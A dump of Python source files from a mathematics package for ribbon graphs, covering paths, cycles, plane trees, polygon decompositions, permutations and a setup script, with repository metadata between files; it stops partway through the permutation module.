def contract_face(ribbon_graph, label):
    """
    If the face is embedded (that is, no vertex is encountered twice when
    going around the face), then it is topologically a disk. This function
    collapses the disk to a single vertex.
    If the face is not embedded, then this will result in an error.
    """
    face = ribbon_graph.face(label)
    # Delete one boundary edge, then contract the rest of the boundary.
    delete_edge(ribbon_graph, label)
    for l in face[1:]:
        contract_edge(ribbon_graph, l)
|
{"/ribbon_graph_base.py": ["/permutation.py", "/cycle.py"], "/maps.py": ["/permutation.py"], "/draw.py": ["/cycle.py", "/decompositions.py"], "/decompositions.py": ["/cycle.py"], "/__init__.py": ["/ribbon_graph_base.py", "/cycle.py", "/maps.py", "/permutation.py", "/trees.py", "/decompositions.py"], "/cycle.py": ["/local_moves.py"], "/trees.py": ["/ribbon_graph_base.py", "/permutation.py"], "/three_manifold.py": ["/permutation.py", "/ribbon_graph_base.py", "/cycle.py", "/local_moves.py"]}
|
27,856
|
malikobeidin/ribbon_graph
|
refs/heads/master
|
/decompositions.py
|
import itertools
from random import choice
from cycle import EmbeddedPath, EmbeddedCycle
class PolygonWithDiagonals(object):
    """
    Numbered clockwise around the boundary, i.e. with the
    exterior face to the left side
    """
    def __init__(self, label, boundary_length, diagonals):
        self.label = label
        self.vertices = range(boundary_length)
        self.diagonals = diagonals
        self.boundary_length = boundary_length
        self._verify_no_diagonal_crossings()
    def _verify_no_diagonal_crossings(self):
        """Raise if any diagonal endpoint is out of range or any two diagonals cross."""
        n = self.boundary_length
        for endpoint_pair in self.diagonals:
            if any(v >= n or v < 0 for v in endpoint_pair):
                raise Exception("Diagonal not in correct range.")
        for pair1, pair2 in itertools.combinations(self.diagonals, 2):
            x, y = sorted(pair1)
            a, b = sorted(pair2)
            # Two chords cross exactly when their endpoints interleave.
            if (a < x < b < y) or (x < a < y < b):
                raise Exception("Diagonals cross.")
    def ribbon_graph(self):
        # TODO: unimplemented.
        pass
def polygon_with_diagonals_from_ribbon_graph(ribbon_graph, exterior_label):
    """
    Build a PolygonWithDiagonals from a ribbon graph whose boundary is the
    face through exterior_label: boundary vertices become polygon vertices,
    and each non-boundary edge becomes a diagonal between the boundary
    positions of its endpoints.
    """
    num_vertices = len(ribbon_graph.vertices())
    boundary_cycle = EmbeddedCycle(ribbon_graph, exterior_label, turn_degrees = [-1]*num_vertices)
    diagonals = []
    for l1, l2 in ribbon_graph.edges():
        # Boundary edges are not diagonals.
        if (l1 in boundary_cycle.labels) or (l2 in boundary_cycle.labels):
            continue
        l1_vertex = None
        l2_vertex = None
        for i, label in enumerate(boundary_cycle.labels[:-1]):
            if l1 in ribbon_graph.vertex(label):
                l1_vertex = i
            if l2 in ribbon_graph.vertex(label):
                l2_vertex = i
            # BUG FIX: boundary position 0 is falsy, so the original
            # truthiness test `if l1_vertex and l2_vertex` failed to stop
            # the scan (and could misbehave) whenever an endpoint sat on
            # the first boundary vertex. Test for None explicitly.
            if l1_vertex is not None and l2_vertex is not None:
                break
        diagonals.append((l1_vertex,l2_vertex))
    polygon_label = str(boundary_cycle.labels[:-1])
    return PolygonWithDiagonals(polygon_label, num_vertices, diagonals)
class CycleTree(object):
    """
    Binary tree recursively splitting an embedded cycle (and the region
    it bounds) into smaller cycles along interior splitting paths.
    """
    def __init__(self, cycle, max_length):
        # left/right children are filled in by split() when possible.
        self.left = None
        self.right = None
        self.cycle = cycle
        self.max_length = max_length
        self.num_nonboundary_vertices = len(cycle.left_side().vertices())
        if self.is_splittable():
            self.split()
    def __repr__(self):
        return "T({})".format(self.cycle)
    def is_splittable(self):
        """A cycle is splittable while its interior has more vertices than its boundary."""
        return len(self.cycle) < self.num_nonboundary_vertices
    def split(self):
        """Find an interior splitting path and recurse into the two resulting cycles."""
        max_length = min(self.max_length, self.num_nonboundary_vertices+1)
        cycle = self.cycle
        possible_splitting_path_starts = interior_pointing_paths(cycle)
        splitting_path = None
        for path in possible_splitting_path_starts:
            splitting_path = find_splitting_path(cycle, path, max_length)
            if splitting_path:
                break
        # NOTE(review): if no seed yields a splitting path, splitting_path
        # is None and split_along_path will receive None — confirm intent.
        cycle1, cycle2 = cycle.split_along_path(splitting_path)
        self.left = CycleTree(cycle1, max_length)
        self.right = CycleTree(cycle2, max_length)
    def split_old(self):
        """Older splitting strategy based on the longest embedded subcycle.

        NOTE(review): apparently superseded by split(); the recursive
        CycleTree calls below are missing the max_length argument and
        would raise TypeError if executed.
        """
        cycle = self.cycle
        ribbon_graph = cycle.ribbon_graph
        vertices = ribbon_graph.vertices()
        boundary_labels = set(cycle.labels)
        num_vertices = len(vertices)
        interior_labels = ribbon_graph.labels() - boundary_labels
        num_boundary_vertices = len(cycle)
        start_label = cycle.start_label
        subcycles = ribbon_graph.search_for_embedded_cycle_with_start_and_goal(start_label, interior_labels, num_vertices)
        subcycle = max(subcycles, key = len)
        leftover_subcycle = cycle.oriented_sum(subcycle.reversed())
        subgraph = subcycle.left_side()
        leftover_subgraph = leftover_subcycle.left_side()
        subcycle_pushed_to_subgraph = EmbeddedCycle(subgraph, subcycle.start_label, labels = subcycle.labels)
        leftover_subcycle_pushed_to_subgraph = EmbeddedCycle(leftover_subgraph, leftover_subcycle.start_label, labels = leftover_subcycle.labels)
        self.left = CycleTree(subcycle_pushed_to_subgraph)
        self.right = CycleTree(leftover_subcycle_pushed_to_subgraph)
    def leaves(self):
        """Return the leaf CycleTree nodes (unsplittable cycles)."""
        leaves = []
        if self.left:
            leaves.extend(self.left.leaves())
            leaves.extend(self.right.leaves())
            return leaves
        else:
            return [self]
    def search_for_embedded_cycle_with_start_and_goal(self, start, goal_labels, max_length):
        """Breadth-first search for embedded cycles through start hitting goal_labels.

        NOTE(review): duplicates the RibbonGraph method of the same name but
        passes `self` (a CycleTree) as the graph — likely a copy-paste leftover.
        """
        embedded_paths = [EmbeddedPath(self, start, labels = [start])]
        cycles_through_goal = []
        for i in range(max_length-1):
            new_paths = []
            for path in embedded_paths:
                new_paths.extend(path.one_step_continuations())
            if new_paths:
                embedded_paths = new_paths
                cycles = [P.complete_to_cycle() for P in embedded_paths if P.is_completable_to_cycle()]
                for cycle in cycles:
                    for label in cycle.labels:
                        if label in goal_labels:
                            cycles_through_goal.append(cycle)
                            break
            else:
                break
        return cycles_through_goal
def interior_pointing_paths(cycle):
    """Return one-label EmbeddedPaths leaving the cycle's boundary and landing off boundary vertices."""
    graph = cycle.ribbon_graph
    boundary_vertices = set(frozenset(graph.vertex(l)) for l in cycle.labels)
    seeds = []
    for label_list in cycle.left_side_labels():
        for label in label_list:
            target = graph.opposite[label]
            # Keep only labels whose far end is NOT on a boundary vertex.
            lands_on_boundary = any(target in bv for bv in boundary_vertices)
            if not lands_on_boundary:
                seeds.append(EmbeddedPath(graph, label, labels=[label]))
    return seeds
def find_splitting_path(cycle, seed_path, max_length):
    """
    Find paths starting on the cycle, going through the left side of the cycle,
    and back to the cycle again.

    Returns the longest such path found (up to max_length), or None.
    """
    seed_paths = [seed_path]
    boundary_vertices = set([frozenset(cycle.ribbon_graph.vertex(l)) for l in cycle.labels])
    longest_splitting_path = None
    biggest_length = 0
    for i in range(max_length-1):
        new_paths = []
        for path in seed_paths:
            new_paths.extend(path.one_step_continuations())
        if new_paths:
            for path in new_paths:
                next_vertex = frozenset(path.next_vertex())
                # A path that re-reaches the boundary (without closing into
                # a cycle) is a candidate splitting path.
                if (next_vertex in boundary_vertices) and (not path.is_completable_to_cycle()):
                    if len(path)>biggest_length:
                        biggest_length = len(path)
                        longest_splitting_path = path
                else:
                    # NOTE(review): paths accumulate in seed_paths across
                    # iterations and are re-extended each round — confirm
                    # this is intended rather than seed_paths = new_paths.
                    seed_paths.append(path)
        else:
            #no paths found
            break
    return longest_splitting_path
|
{"/ribbon_graph_base.py": ["/permutation.py", "/cycle.py"], "/maps.py": ["/permutation.py"], "/draw.py": ["/cycle.py", "/decompositions.py"], "/decompositions.py": ["/cycle.py"], "/__init__.py": ["/ribbon_graph_base.py", "/cycle.py", "/maps.py", "/permutation.py", "/trees.py", "/decompositions.py"], "/cycle.py": ["/local_moves.py"], "/trees.py": ["/ribbon_graph_base.py", "/permutation.py"], "/three_manifold.py": ["/permutation.py", "/ribbon_graph_base.py", "/cycle.py", "/local_moves.py"]}
|
27,857
|
malikobeidin/ribbon_graph
|
refs/heads/master
|
/setup.py
|
# Setup script for the ribbon_graph package.
long_description = """\
This is a package for manipulating ribbon graphs
"""

import re, sys, subprocess, os, shutil, glob, sysconfig
from setuptools import setup, Command
from setuptools.command.build_py import build_py

# Get version number from module
version = re.search("__version__ = '(.*)'",
                    open('__init__.py').read()).group(1)

setup(
    name = 'ribbon_graph',
    version = version,
    description = 'Ribbon Graphs',
    long_description = long_description,
    url = 'https://bitbucket.org/mobeidin/ribbon_graph',
    author = 'Malik Obeidin',
    # NOTE(review): "illiois" looks like a typo for "illinois" — confirm
    # before changing the published metadata.
    author_email = 'mobeidin@illiois.edu',
    license='GPLv2+',
    classifiers = [
        'Development Status :: 5 - Production/Stable',
        'Intended Audience :: Science/Research',
        'License :: OSI Approved :: GNU General Public License v2 or later (GPLv2+)',
        'Operating System :: OS Independent',
        'Programming Language :: Python',
        'Topic :: Scientific/Engineering :: Mathematics',
    ],
    # The package is rooted at the repository top level.
    packages = ['ribbon_graph'],
    package_dir = {'ribbon_graph':''},
    ext_modules = [],
    zip_safe = False,
)
|
{"/ribbon_graph_base.py": ["/permutation.py", "/cycle.py"], "/maps.py": ["/permutation.py"], "/draw.py": ["/cycle.py", "/decompositions.py"], "/decompositions.py": ["/cycle.py"], "/__init__.py": ["/ribbon_graph_base.py", "/cycle.py", "/maps.py", "/permutation.py", "/trees.py", "/decompositions.py"], "/cycle.py": ["/local_moves.py"], "/trees.py": ["/ribbon_graph_base.py", "/permutation.py"], "/three_manifold.py": ["/permutation.py", "/ribbon_graph_base.py", "/cycle.py", "/local_moves.py"]}
|
27,858
|
malikobeidin/ribbon_graph
|
refs/heads/master
|
/__init__.py
|
__version__ = '1.0'

def version():
    """Return the ribbon_graph package version string."""
    return __version__

from ribbon_graph_base import RibbonGraph, random_link_shadow
from cycle import Path, EmbeddedPath, EmbeddedCycle
from maps import StrandDiagram, Link
from permutation import Bijection, Permutation
from trees import MountainRange, RootedPlaneTree
from decompositions import PolygonWithDiagonals, CycleTree

# CONSISTENCY FIX: __all__ omitted several names the module deliberately
# imports above (trees and decompositions classes, plus version); list
# every imported public name so `from ribbon_graph import *` matches.
__all__ = ['RibbonGraph', 'Path', 'EmbeddedPath', 'EmbeddedCycle',
           'StrandDiagram', 'Link', 'Permutation', 'Bijection',
           'random_link_shadow', 'MountainRange', 'RootedPlaneTree',
           'PolygonWithDiagonals', 'CycleTree', 'version']
|
{"/ribbon_graph_base.py": ["/permutation.py", "/cycle.py"], "/maps.py": ["/permutation.py"], "/draw.py": ["/cycle.py", "/decompositions.py"], "/decompositions.py": ["/cycle.py"], "/__init__.py": ["/ribbon_graph_base.py", "/cycle.py", "/maps.py", "/permutation.py", "/trees.py", "/decompositions.py"], "/cycle.py": ["/local_moves.py"], "/trees.py": ["/ribbon_graph_base.py", "/permutation.py"], "/three_manifold.py": ["/permutation.py", "/ribbon_graph_base.py", "/cycle.py", "/local_moves.py"]}
|
27,859
|
malikobeidin/ribbon_graph
|
refs/heads/master
|
/cycle.py
|
import itertools
from local_moves import *
class Path(object):
    """A walk in a RibbonGraph, stored both as a list of half-edge labels
    and as the list of turn degrees taken at each intermediate vertex.

    Either representation can be given; the other is derived from it.
    """
    def __init__(self, ribbon_graph, start_label, labels = [], turn_degrees = []):
        # NOTE(review): mutable default arguments are shared between calls;
        # they are only read here, but None defaults would be safer -- confirm.
        self.ribbon_graph = ribbon_graph
        self.start_label = start_label
        if labels:
            if labels[0] != start_label:
                raise Exception("Starting label must be first in list of labels")
            self.turn_degrees = self._compute_turn_degrees_from_labels(labels)
            self.labels = labels
        elif turn_degrees:
            self.turn_degrees = turn_degrees
            self.labels = self._compute_labels_from_turn_degrees(turn_degrees)
        else:
            raise Exception("Must specify list of half-edge labels or turn degrees")
        # Normalize every turn degree into [0, valence) at its vertex.
        self._make_turn_degrees_positive()

    def _compute_labels_from_turn_degrees(self, turn_degrees):
        # Walk: cross the current edge (opposite), then rotate d steps at the
        # new vertex (next) to pick the outgoing half-edge.
        labels = [self.start_label]
        label = self.start_label
        for d in turn_degrees:
            label = self.ribbon_graph.opposite[label]
            label = self.ribbon_graph.next.iterate(d, label)
            labels.append(label)
        return labels

    def _make_turn_degrees_positive(self):
        # Reduce each turn degree modulo the valence of the vertex it is taken at.
        new_turn_degrees = []
        for label, turn_degree in zip(self.labels[1:], self.turn_degrees):
            vertex_valence = len(self.ribbon_graph.vertex(label))
            new_turn_degrees.append( turn_degree % vertex_valence )
        self.turn_degrees = new_turn_degrees

    def _compute_turn_degrees_from_labels(self, labels):
        # Each turn degree is the position of the next label in the cyclic
        # order around the vertex reached by crossing the current edge.
        turn_degrees = []
        for i in range(len(labels)-1):
            label, next_label = labels[i], labels[i+1]
            op_label = self.ribbon_graph.opposite[label]
            vertex = self.ribbon_graph.vertex(op_label)
            turn_degrees.append(vertex.index(next_label))
        return turn_degrees

    def __repr__(self):
        return "{}({})".format(self.__class__.__name__,self.labels)

    def next_vertex(self):
        """Return the vertex (cyclic label list) at the far end of the last label."""
        return self.ribbon_graph.vertex( self.ribbon_graph.opposite[self.labels[-1]] )

    def inverse_turn_degrees(self):
        """Turn degrees of the reversed walk (vertex valence minus forward index)."""
        inverse_turn_degrees = []
        opposite = self.ribbon_graph.opposite
        labels = self.labels
        for i in range(len(labels)-1):
            label, next_label = labels[i], labels[i+1]
            op_label = opposite[label]
            vertex = self.ribbon_graph.vertex(op_label)
            inverse_turn_degrees.append(len(vertex) - vertex.index(next_label))
        return inverse_turn_degrees
class EmbeddedPath(Path):
    """A Path that visits each vertex of the RibbonGraph at most once."""
    def __init__(self, ribbon_graph, start_label, labels = [], turn_degrees = [], label_set = set([])):
        # NOTE(review): mutable defaults are shared across calls, and
        # _compute_labels_from_label_set consumes (mutates) label_set --
        # callers should pass a throwaway set.
        if labels or turn_degrees:
            super(EmbeddedPath,self).__init__(ribbon_graph,
                                              start_label,
                                              labels=labels,
                                              turn_degrees = turn_degrees)
        elif label_set:
            self.ribbon_graph = ribbon_graph
            self.start_label = start_label
            labels = self._compute_labels_from_label_set(label_set)
            super(EmbeddedPath,self).__init__(ribbon_graph,
                                              start_label,
                                              labels=labels,
                                              turn_degrees = [])
        else:
            raise Exception("Must specify either labels, turn degrees, or the set of labels in the embedded path.")
        self._verify_embedded()

    def _compute_labels_from_label_set(self, label_set):
        # Greedily order the unordered label set into a walk from start_label.
        # Consumes label_set; raises if the next step is ever ambiguous.
        labels = []
        label = self.start_label
        while label_set:
            labels.append(label)
            label = self.ribbon_graph.opposite[label]
            vertex = self.ribbon_graph.vertex(label)
            possible_next_labels = [l for l in label_set if l in vertex]
            if len(possible_next_labels) != 1:
                raise Exception("Label set does not define path")
            label = possible_next_labels[0]
            label_set.remove(label)
        return labels

    def _verify_embedded(self):
        # Embedded = no vertex repeated along the path.
        vertices = [frozenset(self.ribbon_graph.vertex(label)) for label in self.labels]
        if len(set(vertices)) < len(vertices):
            raise Exception("Path is not embedded")

    def possible_next_steps(self):
        """Outgoing labels at the far vertex, or [] if the path already touches it."""
        next_vertex = self.next_vertex()
        for label in next_vertex:
            if label in self.labels:
                return []
        return next_vertex[1:]

    def possible_previous_steps(self):
        """Labels that could extend the path backwards without revisiting a vertex."""
        start_vertex = self.ribbon_graph.vertex(self.start_label)[1:]
        op_labels = [self.ribbon_graph.opposite[l] for l in start_vertex]
        possible_previous_steps = []
        for label in op_labels:
            already_have_vertex = False
            for other_vertex_label in self.ribbon_graph.vertex(label):
                if other_vertex_label in self.labels:
                    already_have_vertex = True
                    break
            if not already_have_vertex:
                possible_previous_steps.append(label)
        return possible_previous_steps

    def one_step_continuations(self):
        """All EmbeddedPaths that extend self by a single edge."""
        continuations = []
        for label in self.possible_next_steps():
            new_labels = self.labels[:]
            new_labels.append(label)
            continuations.append(EmbeddedPath(self.ribbon_graph, self.start_label, labels = new_labels) )
        return continuations

    def concatenate(self, other_embedded_path):
        """Join self with a path whose start is a legal next step of self."""
        if self.ribbon_graph != other_embedded_path.ribbon_graph:
            raise Exception("To concatenate EmbeddedPaths, must be paths in the same RibbonGraph.")
        if other_embedded_path.start_label in self.possible_next_steps():
            new_labels = self.labels[:]
            new_labels.extend(other_embedded_path.labels)
            return EmbeddedPath(self.ribbon_graph, self.start_label, new_labels)
        else:
            raise Exception("Paths cannot be concatenated.")

    def is_completable_to_cycle(self):
        # Completable iff the far vertex contains the starting half-edge.
        return self.start_label in self.next_vertex()

    def complete_to_cycle(self):
        """Close the path into an EmbeddedCycle by stepping back to start_label."""
        if self.is_completable_to_cycle():
            new_labels = self.labels[:]
            new_labels.append(self.start_label)
            return EmbeddedCycle(self.ribbon_graph, self.start_label, labels=new_labels)
        else:
            raise Exception("Not completable to a cycle")

    def __len__(self):
        return len(self.labels)

    def reversed(self):
        """The same path traversed backwards (opposite half-edges, reversed order)."""
        op_labels = list(reversed([self.ribbon_graph.opposite[l] for l in self.labels]))
        return EmbeddedPath(self.ribbon_graph, op_labels[0], labels = op_labels)
class EmbeddedCycle(Path):
    """
    Turn degrees all -1 correspond to faces oriented in the same way as
    the RibbonGraph (with the face to the left side).

    The label list of a cycle repeats start_label at the end.
    """
    def __init__(self, ribbon_graph, start_label, labels = [], turn_degrees = [], label_set = set([])):
        # NOTE(review): mutable defaults are shared across calls, and
        # label_set is consumed (mutated) when used -- pass a throwaway set.
        if labels or turn_degrees:
            super(EmbeddedCycle,self).__init__(ribbon_graph,
                                               start_label,
                                               labels=labels,
                                               turn_degrees = turn_degrees)
        elif label_set:
            self.ribbon_graph = ribbon_graph
            self.start_label = start_label
            labels = self._compute_labels_from_label_set(label_set)
            super(EmbeddedCycle,self).__init__(ribbon_graph,
                                               start_label,
                                               labels=labels,
                                               turn_degrees = [])
        else:
            raise Exception("Must specify either labels, turn degrees, or the set of labels in the embedded cycle.")
        self._verify_embedded_up_to_final_label()
        self._verify_cycle()

    def _compute_labels_from_label_set(self, label_set):
        # Order the unordered label set into a closed walk; consumes label_set.
        labels = []
        label = self.start_label
        while label_set:
            labels.append(label)
            label = self.ribbon_graph.opposite[label]
            vertex = self.ribbon_graph.vertex(label)
            possible_next_labels = [l for l in label_set if l in vertex]
            if len(possible_next_labels) != 1:
                raise Exception("Label set does not define path")
            label = possible_next_labels[0]
            label_set.remove(label)
        labels.append(self.start_label)
        return labels

    def _verify_embedded_up_to_final_label(self):
        # All vertices except the repeated closing one must be distinct.
        vertices = [frozenset(self.ribbon_graph.vertex(label)) for label in self.labels[:-1]]
        if len(set(vertices)) < len(vertices):
            raise Exception("Cycle is not embedded")

    def _verify_cycle(self):
        if self.labels[-1] != self.start_label:
            raise Exception("Not a cycle")

    def __len__(self):
        # Exclude the repeated closing label.
        return len(self.labels)-1

    def starting_at(self, new_start_label):
        """
        Start the cycle at new_start_label instead.
        """
        i = self.labels.index(new_start_label)
        new_labels = self.labels[i:-1]
        new_labels.extend(self.labels[:i])
        new_labels.append(new_start_label)
        return EmbeddedCycle(self.ribbon_graph, new_start_label, new_labels)

    def left_side_labels(self):
        """Per vertex of the cycle, the half-edge labels hanging off its left side."""
        left_sides = []
        next_inv = self.ribbon_graph.next.inverse()
        inv_turn_degrees = self.inverse_turn_degrees()
        for label, turn_degree in zip(self.labels[:-1],inv_turn_degrees):
            next_label = self.ribbon_graph.opposite[label]
            left_side_labels = []
            for j in range(turn_degree-1):
                next_label = next_inv[next_label]
                left_side_labels.append(next_label)
            left_sides.append(left_side_labels)
        return left_sides

    def right_side_labels(self):
        """Per vertex of the cycle, the half-edge labels hanging off its right side."""
        right_sides = []
        for label, turn_degree in zip(self.labels[:-1],self.turn_degrees):
            next_label = self.ribbon_graph.opposite[label]
            right_side_labels = []
            for j in range(turn_degree-1):
                next_label = self.ribbon_graph.next[next_label]
                right_side_labels.append(next_label)
            right_sides.append(right_side_labels)
        return right_sides

    def with_previous_labels(self):
        """Pair each cycle label with the opposite of the label preceding it."""
        opposites = [self.ribbon_graph.opposite[l] for l in self.labels[:-1]]
        # Rotate the opposites by one so entry i precedes label i.
        last = opposites.pop()
        opposites.insert(0, last)
        return zip(self.labels,opposites)

    def cut(self):
        """Cut the ribbon graph open along this cycle (doubling its edges)."""
        R = self.ribbon_graph.copy()
        for l in self.labels[:-1]:
            o = R.opposite[l]
            double_edge(R, l, str(l)+'new', str(o)+'new')
        for l, p in self.with_previous_labels():
            split_vertex(R, l, str(p)+'new')
        return R

    def left_side(self):
        """Connected piece to the left of the cycle, after severing the right side."""
        R = self.ribbon_graph.copy()
        right_side_labels = [l for labels in self.right_side_labels() for l in labels]
        return R.disconnect_vertices(right_side_labels).restricted_to_connected_component_containing(self.start_label)

    def reversed(self):
        """The same cycle traversed in the opposite direction."""
        op_labels = list(reversed([self.ribbon_graph.opposite[l] for l in self.labels]))
        return EmbeddedCycle(self.ribbon_graph, op_labels[0], labels = op_labels)

    def symmetric_difference(self, other_embedded_path):
        """Cycle on the labels appearing in exactly one of the two cycles."""
        if self.ribbon_graph != other_embedded_path.ribbon_graph:
            raise Exception("To take symmetric difference, both cycles must be in the same ribbon graph.")
        label_set = set(self.labels)
        other_label_set = set(other_embedded_path.labels)
        symmetric_difference = label_set.symmetric_difference(other_label_set)
        # Grab an arbitrary element of the set as the new starting point.
        for start_label in symmetric_difference:
            break
        return EmbeddedCycle(self.ribbon_graph, start_label, label_set=symmetric_difference)

    def oriented_sum(self, other_embedded_path):
        """Union of both cycles with oppositely-oriented shared edges cancelled."""
        if self.ribbon_graph != other_embedded_path.ribbon_graph:
            raise Exception("To take symmetric difference, both cycles must be in the same ribbon graph.")
        label_set = set(self.labels)
        other_label_set = set(other_embedded_path.labels)
        new_labels = label_set.union(other_label_set)
        for label in self.labels:
            op_label = self.ribbon_graph.opposite[label]
            # An edge traversed in both directions cancels out of the sum.
            if (label in new_labels) and (op_label in new_labels):
                new_labels.remove(label)
                new_labels.remove(op_label)
        # Grab an arbitrary remaining label as the starting point.
        for start_label in new_labels:
            break
        return EmbeddedCycle(self.ribbon_graph, start_label, label_set=new_labels)

    def split_at_two_points(self, label1, label2):
        """
        Split into two EmbeddedPaths, one starting at label1, and going
        to the label before label2, and the other starting at label2 and going
        to the label before label1.
        One should be to do path1.concatenate(path2).complete_to_cycle() to
        return to the original cycle.
        """
        rotated1 = self.starting_at(label1)
        dist_1to2 = rotated1.labels.index(label2)
        labels1 = rotated1.labels[ : dist_1to2 ]
        rotated2 = self.starting_at(label2)
        dist_2to1 = rotated2.labels.index(label1)
        labels2 = rotated2.labels[ : dist_2to1 ]
        return EmbeddedPath(self.ribbon_graph, label1, labels = labels1), EmbeddedPath(self.ribbon_graph, label2, labels = labels2)

    def split_along_path(self, splitting_path):
        """
        Given an EmbeddedPath going through starting on the left side of
        the boundary, and ending on the left side of the boundary, use this
        path to split self into two cycles which each have a portion of self.
        boundary.
        """
        # Find where the splitting path re-enters the cycle...
        for label1 in splitting_path.possible_next_steps():
            if label1 in self.labels:
                break
        # ...and where it leaves the cycle.
        start_vertex = splitting_path.ribbon_graph.vertex(splitting_path.labels[0])
        for label2 in start_vertex:
            if label2 in self.labels:
                break
        boundary1, boundary2 = self.split_at_two_points(label1, label2)
        cycle1 = splitting_path.concatenate(boundary1).complete_to_cycle()
        cycle2 = splitting_path.reversed().concatenate(boundary2).complete_to_cycle()
        return cycle1, cycle2
def cycle_from_lace_component(ribbon_graph, label):
    """Return the EmbeddedCycle traced by the lace component containing *label*."""
    component = ribbon_graph.lace_component(label)
    start = component[0]
    component.append(start)
    return EmbeddedCycle(ribbon_graph, start, component)
|
{"/ribbon_graph_base.py": ["/permutation.py", "/cycle.py"], "/maps.py": ["/permutation.py"], "/draw.py": ["/cycle.py", "/decompositions.py"], "/decompositions.py": ["/cycle.py"], "/__init__.py": ["/ribbon_graph_base.py", "/cycle.py", "/maps.py", "/permutation.py", "/trees.py", "/decompositions.py"], "/cycle.py": ["/local_moves.py"], "/trees.py": ["/ribbon_graph_base.py", "/permutation.py"], "/three_manifold.py": ["/permutation.py", "/ribbon_graph_base.py", "/cycle.py", "/local_moves.py"]}
|
27,860
|
malikobeidin/ribbon_graph
|
refs/heads/master
|
/trees.py
|
from ribbon_graph_base import RibbonGraph
from permutation import Permutation
from random import shuffle
class MountainRange(object):
    """A Dyck path: a sequence of +1/-1 steps whose partial sums never go
    negative and whose total is zero.  Encodes a rooted plane tree.
    """

    def __init__(self, steps=None):
        """Validate and store the step sequence.

        steps: list of +1/-1 values; raises AssertionError if any partial
        sum dips below zero or the total is nonzero.
        """
        # BUG FIX: the original used a shared mutable default (steps=[]);
        # use None and create a fresh list per instance instead.
        if steps is None:
            steps = []
        s = 0
        for step in steps:
            assert step in [-1, 1]
            s += step
            assert s >= 0   # never dip below the baseline
        assert s == 0       # must return to the baseline at the end
        self.steps = steps

    def rooted_plane_tree(self):
        """
        Mountain ranges give rooted plane trees in a canonical way.
        """
        steps = self.steps
        stack = []
        paired_labels = []
        # Match each up-step with the down-step that closes it; each pair
        # becomes one edge (a 2-cycle of the 'opposite' permutation).
        for i, step in enumerate(steps):
            if step == 1:
                stack.append(i)
            else:
                paired_labels.append([stack.pop(), i])
        opposite = Permutation(cycles=paired_labels)
        next_corner = Permutation(cycles=[range(len(steps))])
        return RootedPlaneTree(0, permutations=[opposite, next_corner.inverse() * opposite])
def random_mountain_range(n):
    """Random balanced +-1 sequence of length 2n, repaired to stay non-negative.

    NOTE(review): the repair step (negating a step whenever the running sum
    is or was negative) does not obviously sample uniformly over Dyck
    paths -- confirm the intended distribution.
    """
    steps = [1]*n
    steps.extend( [-1]*n )
    shuffle(steps)
    s = 0
    for i, step in enumerate(steps):
        s, last_s = s+step, s
        if s < 0 or last_s < 0 :
            steps[i] = -step
    return MountainRange(steps)
def remy_random_rooted_binary_plane_tree(n):
    """Grow a random rooted binary plane tree by repeated leaf insertion.

    Starts from the Y map and, n times, inserts a leaf on a uniformly random
    edge with four fresh labels (i, 0)..(i, 3).
    """
    tree = Y()
    for i in range(n):
        tree = tree.insert_leaf_on_edge(tree.random_label(), [(i,j) for j in range(4)])
    return tree
class RootedPlaneTree(RibbonGraph):
    """A RibbonGraph with exactly one face (a plane tree) plus a root label."""
    def __init__(self, root, permutations = []):
        super(RootedPlaneTree,self).__init__( permutations = permutations )
        assert root in self.labels()
        self.root = root
        # A connected map with a single face is exactly a tree.
        if len(self.faces())>1:
            raise Exception("Map is not a tree")

    def insert_leaf_on_edge(self, label, new_labels):
        """Subdivide the edge at *label* and hang a new leaf on it.

        new_labels: four fresh, unused labels for the inserted Y-piece.
        """
        picture_to_insert, boundary_labels = open_Y(new_labels)
        pairings = [(label,boundary_labels[0]),(self.opposite[label],boundary_labels[1])]
        new_tree = self.disconnect_edges([label])
        new_tree = new_tree.union(picture_to_insert)
        new_tree = new_tree.connect_edges(pairings)
        return RootedPlaneTree(self.root, [new_tree.opposite, new_tree.next])

    def relabeled(self):
        """Return a canonically relabeled copy, rooted at 1."""
        R = self.relabeled_by_root(self.root)
        return RootedPlaneTree(1,[R.opposite, R.next])
def open_Y(new_labels):
    """A small tree piece used to splice a leaf into an existing edge.

    Returns the piece together with the pair (l0, l1) of boundary half-edges
    that get glued to the cut edge of the host tree.
    """
    l0,l1,l2,l3 = new_labels
    return RootedPlaneTree(l0, [Permutation(cycles = [(l0,),(l1,),(l2,l3)]) ,
                                Permutation(cycles = [(l0,l1,l2), (l3,)])]), (l0,l1)
def Y():
    """The 'Y' map: a single trivalent vertex with three pendant leaves."""
    return RootedPlaneTree(0, [Permutation(cycles = [(0,3),(1,4),(2,5)]) ,
                               Permutation(cycles = [(0,1,2), (3,), (4,), (5,)])])
|
{"/ribbon_graph_base.py": ["/permutation.py", "/cycle.py"], "/maps.py": ["/permutation.py"], "/draw.py": ["/cycle.py", "/decompositions.py"], "/decompositions.py": ["/cycle.py"], "/__init__.py": ["/ribbon_graph_base.py", "/cycle.py", "/maps.py", "/permutation.py", "/trees.py", "/decompositions.py"], "/cycle.py": ["/local_moves.py"], "/trees.py": ["/ribbon_graph_base.py", "/permutation.py"], "/three_manifold.py": ["/permutation.py", "/ribbon_graph_base.py", "/cycle.py", "/local_moves.py"]}
|
27,861
|
malikobeidin/ribbon_graph
|
refs/heads/master
|
/permutation.py
|
#from sage.all import Permutation as SagePermutation
from random import shuffle
class Bijection(dict):
    """A dict that also tracks its domain and codomain as sets.

    Invariant (checked when ``verify`` is True): the mapping is injective,
    i.e. the domain and codomain have the same size.
    """

    def __init__(self, dictionary=None, verify=True):
        """Build a Bijection from an optional plain mapping.

        dictionary: initial label -> output_label pairs (read, not mutated).
        verify: when True, assert injectivity after loading.
        """
        self.domain = set()
        self.codomain = set()
        # BUG FIX: was a shared mutable default argument (dictionary={}).
        if dictionary is None:
            dictionary = {}
        for label in dictionary:
            self[label] = dictionary[label]
        if verify:
            assert len(self.domain) == len(self.codomain)

    def __setitem__(self, label, output_label):
        # Deliberately unchecked; use add_label() for the checked insertion.
        # Overwriting an entry leaves a stale element in domain/codomain --
        # existing behavior, kept as-is.
        super(Bijection,self).__setitem__(label,output_label)
        self.domain.add(label)
        self.codomain.add(output_label)

    def add_label(self, label, output_label):
        """Checked insertion: raise if label or output_label is already used."""
        if label in self.domain:
            raise Exception("Cannot change function value at {}".format(label))
        if output_label in self.codomain:
            raise Exception("Output {} already in codomain ".format(output_label))
        super(Bijection,self).__setitem__(label,output_label)
        self.domain.add(label)
        self.codomain.add(output_label)

    def remove_label(self, label):
